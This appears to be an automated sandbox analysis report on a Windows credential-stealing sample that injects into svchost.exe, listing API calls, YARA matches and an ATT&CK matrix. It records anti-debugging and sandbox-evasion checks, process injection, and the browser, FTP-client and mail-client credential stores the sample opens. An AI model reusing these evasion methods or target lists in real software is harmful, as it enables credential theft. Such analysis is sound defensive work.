                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Source: C:\Users\user\Desktop\vsf098633534.exeAPI/Special instruction interceptor: Address: CE3234
                  Source: C:\Users\user\Desktop\vsf098633534.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-106329
                  Source: C:\Users\user\Desktop\vsf098633534.exeAPI coverage: 6.1 %
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 7104Thread sleep time: -360000s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\vsf098633534.exeCode function: 0_2_00B4445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_00B4445A
                  Source: C:\Users\user\Desktop\vsf098633534.exeCode function: 0_2_00B4C6D1 FindFirstFileW,FindClose,0_2_00B4C6D1
                  Source: C:\Users\user\Desktop\vsf098633534.exeCode function: 0_2_00B4C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00B4C75C
                  Source: C:\Users\user\Desktop\vsf098633534.exeCode function: 0_2_00B4EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00B4EF95
                  Source: C:\Users\user\Desktop\vsf098633534.exeCode function: 0_2_00B4F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00B4F0F2
                  Source: C:\Users\user\Desktop\vsf098633534.exeCode function: 0_2_00B4F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00B4F3F3
                  Source: C:\Users\user\Desktop\vsf098633534.exeCode function: 0_2_00B437EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00B437EF
                  Source: C:\Users\user\Desktop\vsf098633534.exeCode function: 0_2_00B43B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00B43B12
                  Source: C:\Users\user\Desktop\vsf098633534.exeCode function: 0_2_00B4BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00B4BCBC
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,1_2_00403D74
                  Source: C:\Users\user\Desktop\vsf098633534.exeCode function: 0_2_00AE49A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00AE49A0
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 60000Jump to behavior
                  Source: svchost.exe, 00000001.00000002.2918386382.0000000003200000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: C:\Users\user\Desktop\vsf098633534.exeAPI call chain: ExitProcess graph end nodegraph_0-103986
                  Source: C:\Users\user\Desktop\vsf098633534.exeCode function: 0_2_00B53F09 BlockInput,0_2_00B53F09
                  Source: C:\Users\user\Desktop\vsf098633534.exeCode function: 0_2_00AE3B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00AE3B3A
                  Source: C:\Users\user\Desktop\vsf098633534.exeCode function: 0_2_00B15A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00B15A7C
                  Source: C:\Users\user\Desktop\vsf098633534.exeCode function: 0_2_00AE4B37 LoadLibraryA,GetProcAddress,0_2_00AE4B37
                  Source: C:\Users\user\Desktop\vsf098633534.exeCode function: 0_2_00CE34A0 mov eax, dword ptr fs:[00000030h]0_2_00CE34A0
                  Source: C:\Users\user\Desktop\vsf098633534.exeCode function: 0_2_00CE3500 mov eax, dword ptr fs:[00000030h]0_2_00CE3500
                  Source: C:\Users\user\Desktop\vsf098633534.exeCode function: 0_2_00CE1E70 mov eax, dword ptr fs:[00000030h]0_2_00CE1E70
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040317B mov eax, dword ptr fs:[00000030h]1_2_0040317B
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00D93060 mov eax, dword ptr fs:[00000030h]1_2_00D93060
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00D93060 mov eax, dword ptr fs:[00000030h]1_2_00D93060
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00D93060 mov eax, dword ptr fs:[00000030h]1_2_00D93060
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00D93060 mov eax, dword ptr fs:[00000030h]1_2_00D93060
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00D94410 mov eax, dword ptr fs:[00000030h]1_2_00D94410
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00D94410 mov eax, dword ptr fs:[00000030h]1_2_00D94410
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00D93540 mov eax, dword ptr fs:[00000030h]1_2_00D93540
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00D93540 mov eax, dword ptr fs:[00000030h]1_2_00D93540
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00D93540 mov eax, dword ptr fs:[00000030h]1_2_00D93540
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00D956A0 mov eax, dword ptr fs:[00000030h]1_2_00D956A0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00D956A0 mov ecx, dword ptr fs:[00000030h]1_2_00D956A0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00D94610 mov eax, dword ptr fs:[00000030h]1_2_00D94610
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00D94610 mov eax, dword ptr fs:[00000030h]1_2_00D94610
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00D94610 mov eax, dword ptr fs:[00000030h]1_2_00D94610
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00D94610 mov eax, dword ptr fs:[00000030h]1_2_00D94610
                  Source: C:\Users\user\Desktop\vsf098633534.exeCode function: 0_2_00B380A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,0_2_00B380A9
                  Source: C:\Windows\SysWOW64\svchost.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\vsf098633534.exeCode function: 0_2_00B0A124 SetUnhandledExceptionFilter,0_2_00B0A124
                  Source: C:\Users\user\Desktop\vsf098633534.exeCode function: 0_2_00B0A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00B0A155
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00D95848 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00D95848
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00D933C0 NtSetInformationProcess,SetUnhandledExceptionFilter,SetErrorMode,GetProcessHeap,InitializeSRWLock,InitializeSRWLock,RegDisablePredefinedCacheEx,EtwEventRegister,GetCommandLineW,memset,GetCurrentProcess,NtSetInformationProcess,HeapFree,HeapFree,ExitProcess,GetCurrentProcess,SetProcessAffinityUpdateMode,1_2_00D933C0

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.21.64.1 80Jump to behavior
                  Source: C:\Users\user\Desktop\vsf098633534.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
                  Source: C:\Users\user\Desktop\vsf098633534.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2E19008Jump to behavior
                  Source: C:\Users\user\Desktop\vsf098633534.exeCode function: 0_2_00B387B1 LogonUserW,0_2_00B387B1
                  Source: C:\Users\user\Desktop\vsf098633534.exeCode function: 0_2_00AE3B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00AE3B3A
                  Source: C:\Users\user\Desktop\vsf098633534.exeCode function: 0_2_00AE48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00AE48D7
                  Source: C:\Users\user\Desktop\vsf098633534.exeCode function: 0_2_00B44C27 mouse_event,0_2_00B44C27
                  Source: C:\Users\user\Desktop\vsf098633534.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\vsf098633534.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\vsf098633534.exeCode function: 0_2_00B37CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00B37CAF
                  Source: C:\Users\user\Desktop\vsf098633534.exeCode function: 0_2_00B3874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00B3874B
                  Source: vsf098633534.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                  Source: vsf098633534.exeBinary or memory string: Shell_TrayWnd
                  Source: C:\Users\user\Desktop\vsf098633534.exeCode function: 0_2_00B0862B cpuid 0_2_00B0862B
                  Source: C:\Users\user\Desktop\vsf098633534.exeCode function: 0_2_00B14E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00B14E87
                  Source: C:\Users\user\Desktop\vsf098633534.exeCode function: 0_2_00B21E06 GetUserNameW,0_2_00B21E06
                  Source: C:\Users\user\Desktop\vsf098633534.exeCode function: 0_2_00B13F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00B13F3A
                  Source: C:\Users\user\Desktop\vsf098633534.exeCode function: 0_2_00AE49A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00AE49A0
                  Source: C:\Windows\SysWOW64\svchost.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.vsf098633534.exe.cf0000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000001.00000002.2918036056.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1677980665.0000000000CF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: vsf098633534.exe PID: 7020, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 7080, type: MEMORYSTR
                  Source: Yara matchFile source: dump.pcap, type: PCAP
                  Source: Yara matchFile source: 00000001.00000002.2918405365.0000000003212000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\SessionsJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Martin PrikrylJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\HostsJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccountsJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeFile opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\SettingsJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\HostsJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\OutlookJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: PopPassword1_2_0040D069
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: SmtpPassword1_2_0040D069
                  Source: vsf098633534.exeBinary or memory string: WIN_81
                  Source: vsf098633534.exeBinary or memory string: WIN_XP
                  Source: vsf098633534.exeBinary or memory string: WIN_XPe
                  Source: vsf098633534.exeBinary or memory string: WIN_VISTA
                  Source: vsf098633534.exeBinary or memory string: WIN_7
                  Source: vsf098633534.exeBinary or memory string: WIN_8
                  Source: vsf098633534.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
                  Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.vsf098633534.exe.cf0000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000001.00000002.2918036056.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1677980665.0000000000CF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: C:\Users\user\Desktop\vsf098633534.exeCode function: 0_2_00B56283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_00B56283
                  Source: C:\Users\user\Desktop\vsf098633534.exeCode function: 0_2_00B56747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00B56747
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00D96AF0 EnterCriticalSection,RpcServerListen,LeaveCriticalSection,I_RpcMapWin32Status,1_2_00D96AF0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00D96BB0 RpcServerUnregisterIfEx,EnterCriticalSection,RpcMgmtStopServerListening,RpcMgmtWaitServerListen,LeaveCriticalSection,I_RpcMapWin32Status,1_2_00D96BB0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00D96B60 RpcServerUnregisterIf,EnterCriticalSection,RpcMgmtStopServerListening,RpcMgmtWaitServerListen,LeaveCriticalSection,I_RpcMapWin32Status,1_2_00D96B60
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire Infrastructure2
                  Valid Accounts
                  2
                  Native API
                  1
                  DLL Side-Loading
                  1
                  Exploitation for Privilege Escalation
                  1
                  Disable or Modify Tools
                  2
                  OS Credential Dumping
                  2
                  System Time Discovery
                  Remote Services1
                  Archive Collected Data
                  3
                  Ingress Tool Transfer
                  Exfiltration Over Other Network Medium1
                  System Shutdown/Reboot
                  CredentialsDomainsDefault Accounts2
                  Command and Scripting Interpreter
                  2
                  Valid Accounts
                  1
                  DLL Side-Loading
                  1
                  Deobfuscate/Decode Files or Information
                  21
                  Input Capture
                  1
                  Account Discovery
                  Remote Desktop Protocol2
                  Data from Local System
                  1
                  Encrypted Channel
                  Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts2
                  Service Execution
                  3
                  Windows Service
                  2
                  Valid Accounts
                  2
                  Obfuscated Files or Information
                  2
                  Credentials in Registry
                  1
                  File and Directory Discovery
                  SMB/Windows Admin Shares1
                  Email Collection
                  3
                  Non-Application Layer Protocol
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook21
                  Access Token Manipulation
                  1
                  DLL Side-Loading
                  NTDS117
                  System Information Discovery
                  Distributed Component Object Model21
                  Input Capture
                  113
                  Application Layer Protocol
                  Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script3
                  Windows Service
                  1
                  Masquerading
                  LSA Secrets131
                  Security Software Discovery
                  SSH3
                  Clipboard Data
                  Fallback ChannelsScheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts312
                  Process Injection
                  2
                  Valid Accounts
                  Cached Domain Credentials11
                  Virtualization/Sandbox Evasion
                  VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
                  Virtualization/Sandbox Evasion
                  DCSync2
                  Process Discovery
                  Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                  Access Token Manipulation
                  Proc Filesystem1
                  Application Window Discovery
                  Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt312
                  Process Injection
                  /etc/passwd and /etc/shadow1
                  System Owner/User Discovery
